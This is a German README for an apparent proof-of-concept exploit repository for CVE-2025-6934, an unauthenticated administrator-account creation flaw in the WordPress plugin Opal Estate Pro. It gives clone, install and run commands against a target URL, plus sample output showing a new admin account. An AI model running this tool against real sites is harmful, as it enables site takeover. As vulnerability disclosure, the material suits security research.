
CVE-2025-6934 ist eine kritische Schwachstelle im WordPress-Plugin Opal Estate Pro (<= 1.7.5), die es nicht authentifizierten Angreifern ermöglicht, über den unsicheren AJAX-Registrierungsprozess des Plugins neue Administrator-Konten zu erstellen.
📖 Beschreibung Dieses Repository enthält einen Proof of Concept (PoC)-Exploit für CVE-2025-6934, eine kritische Schwachstelle im WordPress-Plugin: Opal Estate Pro <= 1.7.5, die die Erstellung eines Administrator-Kontos ohne Authentifizierung ermöglicht.
⚠️ Haftungsausschluss: Dieses Tool dient ausschließlich Bildungs- und Sicherheitsforschungszwecken.
Der Autor ist nicht verantwortlich für Missbrauch oder verursachte Schäden.
readme.txtRepository klonen und Abhängigkeiten installieren:
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
Führen Sie das Skript mit Ihrem Ziel aus:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ Beispielausgabe:
[✔] Exploit Successful!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator

Gaurav Bhattacharjee (0xgh057r3c0n)
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE für Details.